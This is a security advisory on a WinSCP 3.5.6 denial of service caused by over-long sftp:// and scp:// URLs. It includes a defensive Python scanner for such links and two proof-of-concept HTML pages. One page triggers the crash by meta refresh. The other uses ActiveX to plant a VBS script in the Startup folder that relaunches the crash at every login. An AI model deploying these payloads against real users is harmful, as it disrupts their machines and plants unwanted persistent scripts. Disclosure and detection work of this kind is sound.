WinSCP Denial of Service

Summary

WinSCP is "an open source SFTP (SSH File Transfer Protocol) and SCP (Secure CoPy) client for Windows using SSH (Secure SHell). Its main function is safe copying of files between a local and a remote computer". A malicious attacker can send an email containing a link that will cause WinSCP to crash.

Credit:

The information has been provided by Luca Ercoli.


Details

Vulnerable Systems:
 * WinSCP version 3.5.6 (prior versions might also be vulnerable)

The default installation of WinSCP registers the application as the handler for sftp:// and scp:// addresses. The vulnerability lies in the way the application handles long URLs: a malformed scp:// or sftp:// address embedded in an HTML tag causes WinSCP to exhaust CPU and memory resources. The attacker would need to convince the user to visit a web site he controls or to open an HTML e-mail he has prepared. During the denial of service, WinSCP does not display any GUI.
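A content filter on a mail gateway or web proxy can flag this pattern before it reaches a client with the handler installed. The following is an added example, not part of the original advisory: it scans HTML for over-long sftp:// and scp:// URLs in meta refresh targets and common URL attributes. The names scan_html and MAX_URL_LEN and the 256-character limit are assumptions of this example; the advisory does not state the length that triggers the fault.

```python
import re
from html.parser import HTMLParser

# Assumption: the advisory gives no exact trigger length, so this limit is a
# conservative policy value chosen for the example, not a measured threshold.
MAX_URL_LEN = 256
SCHEMES = ("sftp://", "scp://")
URL_ATTRS = {"href", "src", "action", "data"}
REFRESH_URL = re.compile(r"url\s*=\s*['\"]?\s*(.*)", re.I | re.S)


class HandlerUrlScanner(HTMLParser):
    """Collects sftp:// and scp:// URLs longer than MAX_URL_LEN."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # (tag, attribute, scheme, length)

    def _check(self, tag, attr, url):
        # Remove whitespace first: line breaks inside the attribute value
        # must not let a long URL slip under the limit.
        url = re.sub(r"\s+", "", url).strip("'\"")
        for scheme in SCHEMES:
            if url.lower().startswith(scheme) and len(url) > MAX_URL_LEN:
                self.findings.append((tag, attr, scheme, len(url)))

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_URL.search(attrs.get("content", ""))
            if m:
                self._check(tag, "content", m.group(1))
        for name in sorted(URL_ATTRS & attrs.keys()):
            self._check(tag, name, attrs[name])


def scan_html(html):
    """Return a list of findings for one HTML document."""
    scanner = HandlerUrlScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples (not captured traffic).
LONG = '<meta http-equiv="Refresh" content="0; URL=sftp://' + "A" * 600 + '">'
SHORT = '<a href="sftp://files.example.test/pub">files</a>'
WRAPPED = '<a href="scp://' + ("A" * 60 + "\n") * 10 + '">x</a>'
```

A non-empty result is a reason to quarantine or strip the message or page; legitimate sftp:// links are short enough to pass.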

Proof of Concept:
------ WinSCP_DoS1.html ------

<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>

<meta http-equiv='Refresh' content='0; URL=sftp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'>

</HEAD>
<BODY>
</BODY>
</HTML>

------ WinSCP_DoS2.html ------

<html>
  <head>
   <title>WinSCP DoS</title>

 <script language='JScript'>

     var WshShell = new ActiveXObject('WScript.Shell');
     strSU = WshShell.SpecialFolders('StartUp');

     var fso = new ActiveXObject('Scripting.FileSystemObject');
     var vibas = fso.CreateTextFile(strSU + '\WinSCPDoS.vbs',true);

     vibas.WriteLine('Dim shell');
     vibas.WriteLine('Dim quote');
     vibas.WriteLine('Dim DoS');
     vibas.WriteLine('Dim param');
     vibas.WriteLine('DoS = "C:\Programmi\WinSCP3\WinSCP3.exe"');
     vibas.WriteLine('param = "scp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"');
     vibas.WriteLine('set shell = WScript.CreateObject("WScript.Shell")');
     vibas.WriteLine('quote = Chr(34)');
     vibas.WriteLine('pgm = "explorer"');
     vibas.WriteLine('shell.Run quote & DoS & quote & " " & param');

     vibas.Close();

    </script>

  </head>
</html>
